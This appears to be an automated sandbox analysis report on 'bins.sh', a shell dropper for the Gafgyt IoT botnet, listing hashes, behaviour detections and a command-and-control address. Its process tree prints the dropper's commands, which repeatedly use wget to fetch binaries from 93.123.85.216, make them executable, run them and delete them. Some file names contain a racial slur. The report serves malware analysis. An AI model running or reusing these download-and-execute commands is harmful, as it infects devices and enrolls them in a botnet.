Analysis
-
max time kernel
92s -
max time network
14s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
03/08/2024, 04:52
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
bins.sh
-
Size
1KB
-
MD5
0019152fa30c6a1f5babd6dc28ff797f
-
SHA1
06fbe116674f61cccd777f807c072569373c93ef
-
SHA256
de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3
-
SHA512
14fda525ebe67725117dd3187168e9b0aba4c79d1d10133c204406ab217a7a88cab2a982761ba2f5bbd71afbed4af6b70327acf071ec4c50433de529287af1db
Malware Config
Extracted
gafgyt
93.123.85.216:39
Signatures
-
Detected Gafgyt variant 9 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_gafgyt behavioral4/files/fstream-2.dat family_gafgyt behavioral4/files/fstream-3.dat family_gafgyt behavioral4/files/fstream-4.dat family_gafgyt behavioral4/files/fstream-5.dat family_gafgyt behavioral4/files/fstream-6.dat family_gafgyt behavioral4/files/fstream-7.dat family_gafgyt behavioral4/files/fstream-8.dat family_gafgyt behavioral4/files/fstream-9.dat family_gafgyt -
Executes dropped EXE 9 IoCs
ioc pid Process /tmp/boobs 728 boobs /tmp/boobs2 741 boobs2 /tmp/roof 749 roof /tmp/ppc 754 ppc /tmp/sparc 759 sparc /tmp/darkness 764 darkness /tmp/arm5 773 arm5 /tmp/arm6 786 arm6 /tmp/NIGGA7 798 NIGGA7 -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route boobs2 -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route boobs2 -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/roof wget File opened for modification /tmp/ppc wget File opened for modification /tmp/sparc wget File opened for modification /tmp/darkness wget File opened for modification /tmp/boobs wget File opened for modification /tmp/boobs2 wget File opened for modification /tmp/arm5 wget File opened for modification /tmp/arm6 wget File opened for modification /tmp/NIGGA7 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:708
-
/usr/bin/wgetwget http://93.123.85.216/boobs2⤵
- Writes file to tmp directory
PID:715
-
-
/bin/chmodchmod +x boobs2⤵PID:726
-
-
/tmp/boobs./boobs2⤵
- Executes dropped EXE
PID:728
-
-
/bin/rmrm -rf boobs2⤵PID:732
-
-
/usr/bin/wgetwget http://93.123.85.216/boobs22⤵
- Writes file to tmp directory
PID:734
-
-
/bin/chmodchmod +x boobs22⤵PID:740
-
-
/tmp/boobs2./boobs22⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:741
-
-
/bin/rmrm -rf boobs22⤵PID:744
-
-
/usr/bin/wgetwget http://93.123.85.216/roof2⤵
- Writes file to tmp directory
PID:746
-
-
/bin/chmodchmod +x roof2⤵PID:748
-
-
/tmp/roof./roof2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm -rf roof2⤵PID:751
-
-
/usr/bin/wgetwget http://93.123.85.216/ppc2⤵
- Writes file to tmp directory
PID:752
-
-
/bin/chmodchmod +x ppc2⤵PID:753
-
-
/tmp/ppc./ppc2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm -rf ppc2⤵PID:756
-
-
/usr/bin/wgetwget http://93.123.85.216/sparc2⤵
- Writes file to tmp directory
PID:757
-
-
/bin/chmodchmod +x sparc2⤵PID:758
-
-
/tmp/sparc./sparc2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm -rf sparc2⤵PID:761
-
-
/usr/bin/wgetwget http://93.123.85.216/darkness2⤵
- Writes file to tmp directory
PID:762
-
-
/bin/chmodchmod +x darkness2⤵PID:763
-
-
/tmp/darkness./darkness2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm -rf darkness2⤵PID:766
-
-
/usr/bin/wgetwget http://93.123.85.216/arm52⤵
- Writes file to tmp directory
PID:767
-
-
/bin/chmodchmod +x arm52⤵PID:771
-
-
/tmp/arm5./arm52⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm -rf arm52⤵PID:775
-
-
/usr/bin/wgetwget http://93.123.85.216/arm62⤵
- Writes file to tmp directory
PID:777
-
-
/bin/chmodchmod +x arm62⤵PID:784
-
-
/tmp/arm6./arm62⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm -rf arm62⤵PID:788
-
-
/usr/bin/wgetwget http://93.123.85.216/NIGGA72⤵
- Writes file to tmp directory
PID:789
-
-
/bin/chmodchmod +x NIGGA72⤵PID:796
-
-
/tmp/NIGGA7./NIGGA72⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm -rf NIGGA72⤵PID:801
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
275KB
MD5658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA25629e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f
-
Filesize
216KB
MD5e57c0097d80d17a52aad01a8c2e4f9fc
SHA1fffadcdb51b879236df4d4cdf373216dd926e90e
SHA25668a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA51202e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464
-
Filesize
238KB
MD51e78f279e22858585947a52ad8b127d7
SHA162f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA5122d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921
-
Filesize
246KB
MD51f918589efbef4b04e806b7a38fc63f8
SHA1758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb
-
Filesize
246KB
MD5348a8f1c5535fe6a0a698f457c329485
SHA1a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c
-
Filesize
224KB
MD524393febb5e8a233a8df7f00b8c3b147
SHA1f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA25649eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6
-
Filesize
209KB
MD55cf85a36699cca11be8c96c3232654e0
SHA1897379599414d22c9adf9b542266eb6b888b6542
SHA256d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552
-
Filesize
211KB
MD5ca477454b7145f6d2180e32c6f0135f6
SHA1da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA2566a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80
-
Filesize
226KB
MD50e2c431d0b76d5d91af24cd90532cd93
SHA1402554d878c7e73cdf145bb249c604a21e465e1f
SHA25616c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA5128b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc